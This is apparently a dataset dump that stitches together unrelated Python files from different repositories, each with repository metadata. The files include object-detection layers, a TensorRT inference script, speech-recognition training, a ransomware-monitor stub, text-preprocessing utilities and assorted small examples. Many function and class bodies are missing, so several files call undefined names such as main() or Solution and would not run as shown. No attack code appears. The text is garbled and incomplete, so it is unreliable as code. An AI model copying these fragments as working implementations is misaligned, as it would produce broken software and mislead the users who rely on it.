] | null | null | null | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from model.config import cfg
from model.bbox_transform import bbox_transform_inv, clip_boxes
from model.nms_wrapper import nms
def proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride,
anchors):
"""A simplified version compared to fast/er RCNN
For details please see the technical report
"""
if type(cfg_key) == bytes:
cfg_key = cfg_key.decode('utf-8')
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
# Get the scores and bounding boxes
scores = rpn_cls_prob[:, :, :, cfg.NBR_ANCHORS:]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
scores = scores.reshape((-1, 1))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Pick the top region proposals
order = scores.ravel().argsort()[::-1]
if pre_nms_topN > 0:
order = order[:pre_nms_topN]
proposals = proposals[order, :]
scores = scores[order]
# Non-maximal suppression
keep = nms(np.hstack((proposals, scores)), nms_thresh)
# Pick th top region proposals after NMS
if post_nms_topN > 0:
keep = keep[:post_nms_topN]
proposals = proposals[keep, :]
scores = scores[keep]
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
blob = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return blob, scores
def proposal_layer_all(rpn_bbox_pred, im_info, anchors):
    """Return every RoI without any scoring or NMS filtering.

    GRP-HAI later decides which proposals are forwarded to the
    class-specific module, so this layer simply decodes them all.

    Returns:
        rois_all:     (k, 5) array of [batch_idx, x1, y1, x2, y2] rows
                      (batch index is always 0 -- single image only).
        roi_obs_vol:  all-zero int32 observation volume of shape
                      (batch, H, W, NBR_ANCHORS).
        not_keep_ids: (1, 1) all-zero int32 placeholder.
    """
    n_batch, feat_h, feat_w = rpn_bbox_pred.shape[:3]

    # Decode every anchor delta and clip the result to the image bounds.
    decoded = bbox_transform_inv(anchors, rpn_bbox_pred.reshape((-1, 4)))
    decoded = clip_boxes(decoded, im_info[:2])

    # Initial (all-zeros) observation RoI volume.
    obs_volume = np.zeros((n_batch, feat_h, feat_w, cfg.NBR_ANCHORS),
                          dtype=np.int32)
    dropped_ids = np.zeros((1, 1), dtype=np.int32)

    # Prepend a zero batch-index column (single image only).
    zero_batch = np.zeros((decoded.shape[0], 1), dtype=np.float32)
    rois_all = np.hstack((zero_batch, decoded.astype(np.float32, copy=False)))
    return rois_all, obs_volume, dropped_ids
1145f38136a9b2f21e2507449a336cde84624ed4 | 14,999 | py | Python | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | tools/verification/trt_verify.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import os
import time
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import cv2
import mmcv
from tqdm import tqdm
import pickle as pkl
from vis_util import show_corners
from tools.model_zoo import model_zoo as zoo
TRT_LOGGER = trt.Logger()
# Simple helper data class that's a little nicer to use than a 2-tuple.
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine):
    """Allocate paired host/device buffers for every binding of *engine*.

    Returns (inputs, outputs, output_names, bindings, stream): inputs and
    outputs are lists of HostDeviceMem pairs, bindings holds the device
    pointers in engine-binding order, and stream is a fresh CUDA stream.
    """
    inputs = []
    outputs = []
    output_names = []
    bindings = []
    stream = cuda.Stream()
    for binding in engine:
        # Flat element count for this binding, scaled to the max batch size.
        size = trt.volume(
            engine.get_binding_shape(binding)) * engine.max_batch_size
        dtype = trt.nptype(engine.get_binding_dtype(binding))
        print('binding:{}, size:{}, dtype:{}'.format(binding, size, dtype))
        # Allocate page-locked host memory and matching device memory.
        host_mem = cuda.pagelocked_empty(size, dtype)
        device_mem = cuda.mem_alloc(host_mem.nbytes)
        # Append the device buffer to device bindings (binding order matters).
        bindings.append(int(device_mem))
        # Route the pair to the input or output list; record output names so
        # results can later be matched back to their bindings.
        if engine.binding_is_input(binding):
            inputs.append(HostDeviceMem(host_mem, device_mem))
        else:
            outputs.append(HostDeviceMem(host_mem, device_mem))
            output_names.append(binding)
    return inputs, outputs, output_names, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def get_engine(onnx_file_path, engine_file_path=""):
    """Load a serialized TensorRT engine if one exists, otherwise build it.

    Args:
        onnx_file_path: path of the ONNX model to parse when building.
        engine_file_path: path of the serialized engine; when the builder
            enables fp16 mode the '.trt' suffix becomes '_fp16.trt'.

    Returns:
        A deserialized or freshly built ICudaEngine.

    Raises:
        Exception: if the ONNX file cannot be parsed or the engine build
            fails.
    """

    def build_engine(builder):
        """Parse the ONNX file, build a TensorRT engine and serialize it."""
        with builder.create_network() as network, trt.OnnxParser(
                network, TRT_LOGGER) as parser:
            builder.max_workspace_size = 1 << 27  # 128 MB working space
            builder.max_batch_size = 1
            print('max workspace size: {:.2f} MB'.format(
                builder.max_workspace_size / 1024 / 1024))
            tic = time.time()
            # Parse model file
            if not os.path.exists(onnx_file_path):
                print('ONNX file {} not found, please generate it.'.format(
                    onnx_file_path))
                # Bug fix: was exit(0), which reported success on a
                # missing input file.
                exit(1)
            print('Loading ONNX file from path {}...'.format(onnx_file_path))
            with open(onnx_file_path, 'rb') as model:
                print('Beginning ONNX file parsing')
                # Bug fix: parser.parse() returns False on failure; the
                # original discarded it and failed later with a cryptic
                # build error.  Surface the parser diagnostics instead.
                if not parser.parse(model.read()):
                    for err_idx in range(parser.num_errors):
                        print(parser.get_error(err_idx))
                    raise Exception(
                        'failed to parse ONNX file {}'.format(onnx_file_path))
            print('Completed parsing of ONNX file')
            print('Building an engine from file {}; this may take a while...'.
                  format(onnx_file_path))
            engine = builder.build_cuda_engine(network)
            if engine is None:
                raise Exception('build engine failed')
            print('Completed! time cost: {:.1f}s'.format(time.time() - tic))
            # Cache the engine so the next run can skip the slow build.
            with open(engine_file_path, "wb") as f:
                f.write(engine.serialize())
            return engine

    with trt.Builder(TRT_LOGGER) as builder:
        if builder.platform_has_fast_fp16:
            print('enable fp16 mode!')
            builder.fp16_mode = True
            builder.strict_type_constraints = True
            # fp16 engines get a distinct cache file name.
            engine_file_path = engine_file_path.replace('.trt', '_fp16.trt')
        if os.path.exists(engine_file_path):
            # A serialized engine exists: use it instead of rebuilding.
            print("Reading engine from file {}".format(engine_file_path))
            with open(engine_file_path,
                      "rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
                return runtime.deserialize_cuda_engine(f.read())
        else:
            return build_engine(builder)
# Output shapes expected by the post-processor
version = 'v5.5.2'
if 'cm' in version:
num_fg = 12
else:
num_fg = 7
topk = 50
input_h, input_w = (800, 1280)
out_channels = 64
pool_scale = 4
output_h = int(input_h / pool_scale)
output_w = int(input_w / pool_scale)
onnx_files = {
'v4_fp16':
'/private/ningqingqun/torch/centernet/r34_fp16_epoch_16_iter_60000.onnx',
'v5.1.16':
'/private/ningqingqun/mmdet/outputs/v5.1.16/centernet_r18_ignore_1017_1915_gpu12/epoch_35_iter_3675.onnx',
'v5.tmp':
'work_dirs/debug/centernet_r18_ignore_1105_1118_desktop/epoch_1_iter_500.onnx',
'cm-v0.1':
'work_dirs/debug/centernet_r18_no_1119_1954_desktop/epoch_35_iter_4305.onnx',
'cm-v0.2':
'work_dirs/debug/centernet_r18_no_1120_1157_desktop/epoch_40_iter_4920.onnx',
'cm-v0.6':
'/private/ningqingqun/mmdet/outputs/no31_36/centernet_r18_adam_no_crop_1129_1920_gpu9/epoch_10_iter_2000.onnx',
'cm-v0.8':
'/work/work_dirs/v5.3.3/centernet_r18_finetune_large_1207_1707_desktop/epoch_20_iter_1160.onnx'
}
name2shape = {
'heatmap': (1, num_fg, output_h, output_w),
'height_feats': (1, 3, output_h, output_w),
'reg_xoffset': (1, 3, output_h, output_w),
'reg_yoffset': (1, 3, output_h, output_w),
'pose': (1, output_h, output_w),
'raw_features': (1, output_h, output_w, out_channels),
'heatmap_indexs': (1, topk),
'wh_feats': (1, 2, output_h, output_w),
'reg_offset': (1, 2, output_h, output_w),
}
def main():
    """Create a TensorRT engine for ONNX-based centernet and run inference.

    Builds/loads the engine for the configured `version`, runs every image
    returned by get_images() through it, reshapes the flat output buffers
    via name2shape, and writes visualization images to out_dir.

    NOTE(review): get_images, preprocess, do_inference, show_results_3d and
    show_results_2d are not defined in this excerpt -- presumably defined
    elsewhere in the original file; confirm before reuse.
    """
    try:
        cuda.init()
        major, minor = cuda.Device(0).compute_capability()
    except:
        # NOTE(review): bare except discards the original error details.
        raise Exception("failed to get gpu compute capability")
    # Engine cache files are keyed by GPU compute capability (e.g. '-6.1.trt').
    onnx_file_path = zoo[version]['model_file'].replace('.pth', '.onnx')
    new_ext = '-{}.{}.trt'.format(major, minor)
    engine_file_path = onnx_file_path.replace('.onnx', new_ext)
    # engine_file_path ='/private/ningqingqun/torch/centernet/vision_detector_fabu_v4.0.0-5.1.5.0-6.1.trt'
    # Download a dog image and save it to the following file path:
    image_list = get_images()
    out_dir = '/private/ningqingqun/results/trt_results/' + version + '_20191220_mining'
    if not os.path.isdir(out_dir):
        os.makedirs(out_dir)
    # Do inference with TensorRT
    trt_outputs = []
    with get_engine(onnx_file_path, engine_file_path
                    ) as engine, engine.create_execution_context() as context:
        inputs, outputs, output_names, bindings, stream = allocate_buffers(
            engine)
        # Do inference
        # print('Running inference on image {}...'.format(input_image_path))
        # Set host input to the image.
        # The common.do_inference function will copy the input to the GPU
        # before executing.
        for input_image_path in tqdm(image_list):
            # input_h, input_w = (input_h // 32 * 32, input_w // 32 * 32)
            im = cv2.imread(input_image_path)
            resized_image = cv2.resize(im, (input_w, input_h))
            input_image = preprocess(resized_image)
            inputs[0].host = input_image
            # tic = time.time()
            trt_outputs = do_inference(
                context,
                bindings=bindings,
                inputs=inputs,
                outputs=outputs,
                stream=stream)
            # print('inference time cost: {:.1f}ms'.format(
            #     (time.time() - tic) * 1000))
            # Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
            trt_outputs = [
                output.reshape(name2shape[name])
                for output, name in zip(trt_outputs, output_names)
            ]
            class_names = [
                'car', 'bus', 'truck', 'person', 'bicycle', 'tricycle', 'block'
            ]
            out_file = os.path.join(out_dir,
                                    os.path.basename(input_image_path))
            # 'v5' models get 3D visualization; 'cm' models use their own
            # label set with plain 2D visualization.
            if 'v5' in version:
                show_results_3d(resized_image.copy(), trt_outputs, out_file,
                                class_names)
            elif 'cm' in version:
                class_names = [
                    'right20',
                    'right40',
                    'right45',
                    'left20',
                    'left40',
                    'left45',
                    'NO31',
                    'NO32',
                    'NO33',
                    'NO34',
                    'NO35',
                    'NO36',
                ]
                show_results_2d(resized_image.copy(), trt_outputs, out_file,
                                class_names)
            else:
                show_results_2d(resized_image.copy(), trt_outputs, out_file,
                                class_names)


if __name__ == '__main__':
    main()
| 37.876263 | 151 | 0.626775 |
1146252ac942d4c9ff4deece36ba6f7c91187e06 | 1,741 | py | Python | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | Main.py | 0ne0rZer0/Mon-T-Python | c263ed540d811a8bc238b859f03a52cc1151779c | [
"MIT"
] | null | null | null | import os, time, sys, hashlib
# Python Recreation of MonitorSauraus Rex.
# Originally Developed by Luke Barlow, Dayan Patel, Rob Shire, Sian Skiggs.
# Aims:
# - Detect Rapid File Changes
# - Cut Wifi Connections
# - Create Logs for running processes at time of trigger, find source infection file.
# - Create "Nest" Safe folder , with encryption and new file types. ".egg" type?
# - Create Notification for a user/admin? Connect to a database?
# - kill running processes in aim to kill attack.
# Getting MD5 Hash of a string:
# print (hashlib.md5("Your String".encode('utf-8')).hexdigest())
# Accumulator for collected MD5 hashes of monitored files.
origHashList = []

# Getting MD5 Hash of a file:
# Shows Correct Hash Changes Upon File Alteration.
# Prints The Collected Hashes.

# Main Method
# NOTE(review): main() is not defined in this excerpt -- presumably
# stripped from the dump; confirm against the full source.
main()

#Use checksumdir python package available for calculating checksum/hash of directory. It's available at https://pypi.python.org/pypi/checksumdir/1.0.5
#Usage :
#import checksumdir
#hash = checksumdir.dirhash("c:\\temp")
#print hash
1148006841dace7c2d15cf681638c79c776c650b | 270 | py | Python | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | 1 | 2020-10-20T09:14:15.000Z | 2020-10-20T09:14:15.000Z | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | null | null | null | pytext/data/sources/__init__.py | shruti-bh/pytext | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .data_source import DataSchema, DataSchemaConfig, DataSource
from .tsv import TSVDataSource
__all__ = ["DataSchema", "DataSchemaConfig", "DataSource", "TSVDataSource"]
| 30 | 75 | 0.774074 |
1148e9602cf3ea5d501cac86ca50ffbe359518e0 | 4,444 | py | Python | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | 2 | 2018-05-03T07:50:03.000Z | 2018-06-17T04:32:13.000Z | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | null | null | null | src/Competition/4.25.com3.py | Peefy/PeefyLeetCode | 92156e4b48ba19e3f02e4286b9f733e9769a1dee | [
"Apache-2.0"
] | 3 | 2018-11-09T14:18:11.000Z | 2021-11-17T15:23:52.000Z |
import math
if __name__ == "__main__":
solution = Solution()
print(solution.minimalSteps(["S#O", "M..", "M.T"]))
print(solution.minimalSteps(["S#O", "M.#", "M.T"]))
print(solution.minimalSteps(["S#O", "M.T", "M.."]))
| 37.982906 | 108 | 0.464446 |
11499a7441906f3bce3d215812d969fa784411f0 | 3,836 | py | Python | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | 1 | 2021-05-28T15:31:53.000Z | 2021-05-28T15:31:53.000Z | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | null | null | null | coinextAPI.py | R-Mascarenhas/CryptoTrade | 491a7a2e562694312843fbc58a003904d3d97000 | [
"Apache-2.0"
] | null | null | null | import requests
import json
from datetime import date, datetime, timedelta | 36.188679 | 124 | 0.618352 |
11499dc46efd3a0f04d31a58e295c03134ec2637 | 469 | py | Python | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | 8 | 2018-02-28T16:02:36.000Z | 2021-08-06T12:57:39.000Z | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | null | null | null | example/soft_spi_example.py | amaork/raspi-io | aaea4532569010a64f3c54036b9db7eb81515d1a | [
"MIT"
] | 1 | 2019-05-08T06:50:33.000Z | 2019-05-08T06:50:33.000Z | from raspi_io import SoftSPI, GPIO
import raspi_io.utility as utility
if __name__ == "__main__":
address = utility.scan_server(0.05)[0]
cpld = SoftSPI(address, GPIO.BCM, cs=7, clk=11, mosi=10, miso=9, bits_per_word=10)
flash = SoftSPI(address, GPIO.BCM, cs=8, clk=11, mosi=10, miso=9, bits_per_word=8)
cpld.write([0x0])
cpld.write([0x10])
cpld.write([0x30])
cpld.write([0x80])
data = flash.xfer([0x9f], 3)
flash.print_binary(data)
| 31.266667 | 86 | 0.66951 |
114a920b441f7acbb102aa82afab60cd9f2a194e | 2,527 | py | Python | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | video/train_vqvae_lstm.py | arash-safari/vp | 377e0172112157b79690b32349481a17e7590063 | [
"MIT"
] | null | null | null | from torch import nn, optim
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import torch
| 35.591549 | 117 | 0.550455 |
114baac9b0ba0fd601c9c440b172f038a36ec799 | 307 | py | Python | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | Curso_de_Python_3_do_Basico_Ao_Avancado_Udemy/aula069/zip_e_zip_longest.py | DanilooSilva/Cursos_de_Python | 8f167a4c6e16f01601e23b6f107578aa1454472d | [
"MIT"
] | null | null | null | """
Zip - Unindo iterveis
Zip_longest _ Itertools
"""
from itertools import zip_longest, count
index = count()
cidades = ['Sao Paulo', 'Belo Horizonte', 'Salvador', 'Monte Belo']
estados = ['SP', 'MG', 'BA']
cidades_estados = zip_longest(cidades, estados)
for valor in cidades_estados:
print(valor) | 20.466667 | 67 | 0.70684 |
114bfce52e4cd09b2cceb92b610dc1db5f94447b | 7,087 | py | Python | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 575 | 2020-05-29T07:31:40.000Z | 2022-03-31T16:06:48.000Z | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 67 | 2020-08-05T16:17:28.000Z | 2022-03-12T09:04:33.000Z | VoiceAssistant/speechrecognition/neuralnet/train.py | Reyansh0667/A-Programmer-AI-Voice-Assistant | 7350050515fe333627c9c27b17d1e98d99b8a5c2 | [
"MIT"
] | 259 | 2020-05-30T15:04:59.000Z | 2022-03-30T02:56:03.000Z | import os
import ast
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from pytorch_lightning.core.lightning import LightningModule
from pytorch_lightning import Trainer
from argparse import ArgumentParser
from model import SpeechRecognition
from dataset import Data, collate_fn_padd
from pytorch_lightning.loggers import TensorBoardLogger
from pytorch_lightning.callbacks import ModelCheckpoint
if __name__ == "__main__":
parser = ArgumentParser()
# distributed training setup
parser.add_argument('-n', '--nodes', default=1, type=int, help='number of data loading workers')
parser.add_argument('-g', '--gpus', default=1, type=int, help='number of gpus per node')
parser.add_argument('-w', '--data_workers', default=0, type=int,
help='n data loading workers, default 0 = main process only')
parser.add_argument('-db', '--dist_backend', default='ddp', type=str,
help='which distributed backend to use. defaul ddp')
# train and valid
parser.add_argument('--train_file', default=None, required=True, type=str,
help='json file to load training data')
parser.add_argument('--valid_file', default=None, required=True, type=str,
help='json file to load testing data')
parser.add_argument('--valid_every', default=1000, required=False, type=int,
help='valid after every N iteration')
# dir and path for models and logs
parser.add_argument('--save_model_path', default=None, required=True, type=str,
help='path to save model')
parser.add_argument('--load_model_from', default=None, required=False, type=str,
help='path to load a pretrain model to continue training')
parser.add_argument('--resume_from_checkpoint', default=None, required=False, type=str,
help='check path to resume from')
parser.add_argument('--logdir', default='tb_logs', required=False, type=str,
help='path to save logs')
# general
parser.add_argument('--epochs', default=10, type=int, help='number of total epochs to run')
parser.add_argument('--batch_size', default=64, type=int, help='size of batch')
parser.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
parser.add_argument('--pct_start', default=0.3, type=float, help='percentage of growth phase in one cycle')
parser.add_argument('--div_factor', default=100, type=int, help='div factor for one cycle')
parser.add_argument("--hparams_override", default="{}", type=str, required=False,
help='override the hyper parameters, should be in form of dict. ie. {"attention_layers": 16 }')
parser.add_argument("--dparams_override", default="{}", type=str, required=False,
help='override the data parameters, should be in form of dict. ie. {"sample_rate": 8000 }')
args = parser.parse_args()
args.hparams_override = ast.literal_eval(args.hparams_override)
args.dparams_override = ast.literal_eval(args.dparams_override)
if args.save_model_path:
if not os.path.isdir(os.path.dirname(args.save_model_path)):
raise Exception("the directory for path {} does not exist".format(args.save_model_path))
main(args) | 43.478528 | 111 | 0.658389 |
114f19bb66b60d61b441f7697a5eae83b5d30c4e | 596 | py | Python | DRL/models/oct/18-argon/session1/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | null | null | null | DRL/models/oct/18-argon/session1/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | 1 | 2020-01-08T06:52:03.000Z | 2020-01-08T07:05:44.000Z | DRL/models/oct/18-argon/session1a/reward.py | EXYNOS-999/AWS_JPL_DRL | ea9df7f293058b0ca2dc63753e68182fcc5380f5 | [
"Apache-2.0"
] | null | null | null | """
AWS DeepRacer reward function using only progress
"""
#===============================================================================
#
# REWARD
#
#===============================================================================
| 27.090909 | 80 | 0.458054 |
114fdc8df483131a51698126243a63c5be6a6a0e | 579 | py | Python | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | null | null | null | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | 5 | 2020-07-13T17:33:29.000Z | 2020-09-11T16:21:54.000Z | djcelery_model/tests/testapp/tasks.py | idanshimon/django-celery-model | 0127bdf7a30ca97a2f0054413c7892477bd03d2f | [
"MIT"
] | 1 | 2020-12-07T13:27:02.000Z | 2020-12-07T13:27:02.000Z | from __future__ import absolute_import, unicode_literals
from hashlib import sha1
from time import sleep
from celery import shared_task
from .models import JPEGFile
| 19.3 | 56 | 0.749568 |
11534d93e39e29332cbc56c2467f77183e5bab66 | 2,028 | py | Python | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | null | null | null | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | 1 | 2016-09-27T03:23:38.000Z | 2016-09-27T03:23:38.000Z | tests/test_redirector.py | lawliet89/flask-redirector | 8637c2bd0025bb48db8694c83ad64825a85825a5 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
"""
Redirector tests
"""
from redirector import views
| 28.56338 | 97 | 0.688363 |
1157a67a471d97e9b998c20a52b64bbf93cf6c33 | 13,715 | py | Python | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | multipy/check.py | kamilazdybal/multipy | ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9 | [
"MIT"
] | null | null | null | """multipy: Python library for multicomponent mass transfer"""
__author__ = "James C. Sutherland, Kamila Zdybal"
__copyright__ = "Copyright (c) 2022, James C. Sutherland, Kamila Zdybal"
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = ["Kamila Zdybal"]
__email__ = ["kamilazdybal@gmail.com"]
__status__ = "Production"
import numpy as np
import pandas as pd
import random
import copy
import scipy
import multipy
import warnings
gas_constant = 8.31446261815324
################################################################################
################################################################################
####
#### Class: Check
####
################################################################################
################################################################################
| 38.525281 | 206 | 0.587386 |
1157f9d0f3382897cf392138bb21e63963ec687a | 1,311 | py | Python | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | backtesting/__init__.py | mhconradt/research-tools | b60f42bcce571665d918c1637f532a5a9f5caf4b | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from backtesting.analysis import plot_cost_proceeds, plot_holdings, \
plot_performance
from backtesting.report import Report
from backtesting.simulation import simulate
if __name__ == '__main__':
    # NOTE(review): main() is not defined in this excerpt -- presumably
    # stripped from the dump; confirm against the full source.
    main()

# Explicit public API of the backtesting package.
__all__ = ['simulate', 'plot_holdings', 'plot_cost_proceeds',
           'plot_performance']
| 33.615385 | 77 | 0.670481 |
11582c4c142efc6bf040a2f6c49882faa3503209 | 24,681 | py | Python | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | 19 | 2019-06-24T18:33:36.000Z | 2022-01-21T03:16:12.000Z | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | null | null | null | relation_extraction/data/preprocess.py | geetickachauhan/relation-extraction | aa920449b20c7127954eaaaa05244e7fc379e018 | [
"MIT"
] | 11 | 2019-06-02T08:59:16.000Z | 2021-08-23T04:31:07.000Z | '''
Author: Geeticka Chauhan
Performs pre-processing on a csv file independent of the dataset (once converters have been applied).
Refer to notebooks/Data-Preprocessing for more details. The methods are specifically used in the non
_original notebooks for all datasets.
'''
import os, pandas as pd, numpy as np
import nltk
import spacy
from spacy.tokens import Doc
# important global variables for identifying the location of entities
entity1 = 'E'
entity2 = 'EOTHER'
entity_either = 'EEITHER'
'''
The methods below are for the preprocessing type 1
'''
# separate the indexes of entity 1 and entity 2 by what is intersecting
# and what is not
# given an entity replacement dictionary like {'0:0': 'entity1'}
# provide more information related to the location of the entity
###
### Helper functions
###
#given string 12:30, return 12, 30 as a tuple of ints
# remove any additional whitespace within a line
# adapted from tag_sentence method in converter_ddi
# note that white spaces are added in the new sentence on purpose
'''
Preprocessing Type 2: Removal of stop words, punctuations and the replacement of digits
'''
# gives a dictionary signifying the location of the different entities in the sentence
# given the index information of the entities, return the sentence with
# tags ESTART EEND etc to signify the location of the entities
# preprocessing 2: remove the stop words and punctuation from the data
# and replace all digits
# TODO: might be nice to give an option to specify whether to remove the stop words or not
# this is a low priority part though
'''
Preprocessing Type 3 part 1: NER
'''
# a method to check for overlap between the ner_dict that is created
###
### Helper functions for the NER replacement
###
# for indexes that look like (1,1) and (2,2) check if the left is fully included in the right
#else there is no overlap
# taken from https://stackoverflow.com/questions/46548902/converting-elements-of-list-of-nested-lists-from-string-to-integer-in-python
# given all of these dictionaries, return the ner replacement dictionary
# this function is different from the sort_position_keys because
# we care about sorting not just by the beginning token, but also by the length that the span contains
# given a splitted sentence - make sure that the sentence is in list form
'''
Below methods do entity detection from the tagged sentences, i.e. a sentence that contains
ESTART, EEND etc, use that to detect the locations of the respective entities and remove the tags
from the sentence to return something clean
'''
# below is taken directly from the ddi converter and
# removes the first occurence of the start and end, and tells of their location
# based upon the method in converter for DDI, this will do removal of the entity tags and keep
# track of where they are located in the sentence
#TODO unify the preprocessing code with actually writing to a dataframe so that experiments can be started
# Read the original dataframe, generate the replacement sentence and then from that, you should just
# call the get_entity_positions_and_replacement_sentence
# might be good to just have one method to do this because it seems like the tasks are kinda similar
# just different methods to call for preprocessing 1 vs 2
'''
Returns the dataframe after doing the preprocessing
'''
# update the metadata and the sentence with the preprocessed version
# give this preprocessing function a method to read the dataframe, and the location of the original
# dataframe to read so that it can do the preprocessing
# whether to do type 1 vs type 2 of the preprocessing
# 1: replace with all concepts in the sentence, 2: replace the stop words, punctuations and digits
# 3: replace only punctuations and digits
| 48.680473 | 134 | 0.677485 |
115918a7f0ed81b2789ef7c2542b4e40e41471f5 | 9,868 | py | Python | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | 1 | 2022-03-01T23:51:26.000Z | 2022-03-01T23:51:26.000Z | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | null | null | null | SWAPLINEmain.py | ernforslab/Hu-et-al._GBMlineage2022 | 508744307746f357c75c1b1e92d9739a11d76870 | [
"BSD-3-Clause"
] | 3 | 2022-03-01T23:53:20.000Z | 2022-03-28T08:01:07.000Z | import datetime
import seaborn as sns
import pickle as pickle
from scipy.spatial.distance import cdist, pdist, squareform
import pandas as pd
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
#from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
